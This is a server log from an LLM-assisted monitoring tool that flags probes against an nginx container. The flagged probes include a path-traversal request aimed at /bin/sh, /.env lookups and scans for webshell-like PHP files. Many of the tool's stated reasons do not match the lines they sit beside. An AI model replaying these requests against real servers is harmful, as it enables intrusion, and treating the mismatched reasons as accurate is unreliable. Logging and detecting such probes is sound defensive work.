08:28:31.933885 [observer] Patterns: hash=3125 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:01.990034 [observer] Pipeline: processed=3193 pattern_hits=3128 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:01.990232 [observer] Patterns: hash=3128 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:31.936787 [observer] Pipeline: processed=3196 pattern_hits=3131 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:31.936816 [observer] Patterns: hash=3131 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:29:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:29:38.036546 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or 
probe attempt. Line=2026-03-20T08:29:38.036255556Z 181.176.14.90 - - [20/Mar/2026:08:29:38 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-" Mar 20 08:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:01.951537 [observer] Pipeline: processed=3199 pattern_hits=3134 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:01.951562 [observer] Patterns: hash=3134 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:31.935313 [observer] Pipeline: processed=3203 pattern_hits=3138 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:30:31.935336 [observer] Patterns: hash=3138 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:01.948829 [observer] Pipeline: processed=3205 pattern_hits=3140 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:01.948972 [observer] Patterns: hash=3140 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:31.933964 [observer] Pipeline: processed=3211 pattern_hits=3146 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:31:31.933989 [observer] Patterns: hash=3146 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:01.961546 [observer] Pipeline: processed=3213 pattern_hits=3148 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:01.961575 [observer] Patterns: hash=3148 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 
08:32:31.953523 [observer] Pipeline: processed=3215 pattern_hits=3150 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:32:31.953557 [observer] Patterns: hash=3150 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:01.952482 [observer] Pipeline: processed=3219 pattern_hits=3154 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:01.952528 [observer] Patterns: hash=3154 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:31.935493 [observer] Pipeline: processed=3221 pattern_hits=3156 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:33:31.935518 [observer] Patterns: hash=3156 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:01.940563 [observer] Pipeline: processed=3225 pattern_hits=3160 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:01.940588 [observer] Patterns: hash=3160 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:31.944410 [observer] Pipeline: processed=3227 pattern_hits=3162 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:31.944440 [observer] Patterns: hash=3162 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=65 Mar 20 08:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:54.360544 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 08:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:54.360580 [analyzer] Source hint mismatch: LLM says 
"tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 08:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:59.308441 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 08:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:34:59.308476 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 08:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:01.951648 [observer] Pipeline: processed=3234 pattern_hits=3166 llm_calls=68 llm_errors=0 learned=0 Mar 20 08:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:01.951678 [observer] Patterns: hash=3166 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=68 Mar 20 08:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:08.171555 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 08:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:08.171601 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 08:35:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:23.233848 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 08:35:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:23.233896 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 08:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:31.941940 [observer] Pipeline: processed=3237 pattern_hits=3168 llm_calls=69 llm_errors=0 learned=0 Mar 20 08:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:35:31.941968 [observer] Patterns: hash=3168 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=69 Mar 20 08:36:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 08:36:01.956815 [observer] Pipeline: processed=3239 pattern_hits=3170 llm_calls=69 llm_errors=0 learned=0 Mar 20 08:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:01.956844 [observer] Patterns: hash=3170 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=69 Mar 20 08:36:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:09.810547 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.90 action=allow pattern_type=prefix Mar 20 08:36:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:09.810583 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 08:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:31.934138 [observer] Pipeline: processed=3246 pattern_hits=3176 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:36:31.934181 [observer] Patterns: hash=3176 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:01.966773 [observer] Pipeline: processed=3248 pattern_hits=3178 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:01.966813 [observer] Patterns: hash=3178 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:31.936277 [observer] Pipeline: processed=3252 pattern_hits=3182 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:37:31.936309 [observer] Patterns: hash=3182 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:01.955036 [observer] Pipeline: processed=3254 pattern_hits=3184 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:38:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 08:38:01.955081 [observer] Patterns: hash=3184 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:31.933932 [observer] Pipeline: processed=3258 pattern_hits=3188 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:38:31.933958 [observer] Patterns: hash=3188 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:01.956336 [observer] Pipeline: processed=3260 pattern_hits=3190 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:01.956365 [observer] Patterns: hash=3190 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:31.952244 [observer] Pipeline: processed=3262 pattern_hits=3192 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:39:31.952266 [observer] Patterns: hash=3192 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:01.940315 [observer] Pipeline: processed=3266 pattern_hits=3196 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:01.940337 [observer] Patterns: hash=3196 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:31.950995 [observer] Pipeline: processed=3268 pattern_hits=3198 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:40:31.951025 [observer] Patterns: hash=3198 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:01.938476 [observer] Pipeline: processed=3272 
pattern_hits=3202 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:01.938507 [observer] Patterns: hash=3202 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:31.942934 [observer] Pipeline: processed=3276 pattern_hits=3206 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:41:31.942969 [observer] Patterns: hash=3206 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:01.940548 [observer] Pipeline: processed=3280 pattern_hits=3210 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:01.940575 [observer] Patterns: hash=3210 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:31.940051 [observer] Pipeline: processed=3282 pattern_hits=3212 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:42:31.940092 [observer] Patterns: hash=3212 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:01.980105 [observer] Pipeline: processed=3284 pattern_hits=3214 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:01.980148 [observer] Patterns: hash=3214 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:31.934554 [observer] Pipeline: processed=3288 pattern_hits=3218 llm_calls=70 llm_errors=0 learned=0 Mar 20 08:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:31.934576 [observer] Patterns: hash=3218 prefix=0 regex=0 contains=0 deny=12 alert=40 suppress=0 misses=70 Mar 20 08:43:55 ip-172-26-12-110 
observer[1565011]: 2026/03/20 08:43:55.027899 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T08:43:55.027483409Z 2026/03/20 08:43:55 [error] 422#422: *747576 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 104.253.36.159, server: _, request: "G... Mar 20 08:43:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:55.027988 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T08:43:55.027493817Z 104.253.36.159 - - [20/Mar/2026:08:43:55 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li... Mar 20 08:43:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:43:55.461563 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T08:43:55.461275298Z 104.253.36.159 - - [20/Mar/2026:08:43:55 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G... 
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.261495 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.261241128Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.501623 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. 
Line=2026-03-20T09:11:29.501326175Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.591011 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.590709126Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.660122 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.659883348Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.734674 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.734093724Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.802290 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. 
Line=2026-03-20T09:11:29.801989619Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.872126 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.871655476Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.939526 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.939258963Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.007818 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.007118309Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.075069 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. 
Line=2026-03-20T09:11:30.074761455Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.142712 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.142411197Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.210530 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.210257675Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.277722 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.277468173Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.345530 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. 
Line=2026-03-20T09:11:30.345291860Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.413034 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.412785677Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.480850 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.480383856Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.551582 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:30.551303618Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:31.936964 [observer] Pipeline: processed=3480 pattern_hits=3409 llm_calls=71 llm_errors=0 learned=0 Mar 20 09:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:31.936988 [observer] Patterns: hash=3409 prefix=0 regex=0 contains=0 deny=13 alert=59 suppress=0 misses=71 Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.379831 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.58 action=alert pattern_type= Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.379880 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:30.650209958Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380036 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:30.730431213Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380073 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:30.799786867Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380101 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.900390780Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.982242423Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380183 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:31.049516590Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /000.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380216 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.117391229Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /000.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380246 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.184459947Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380276 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.252488052Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380303 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
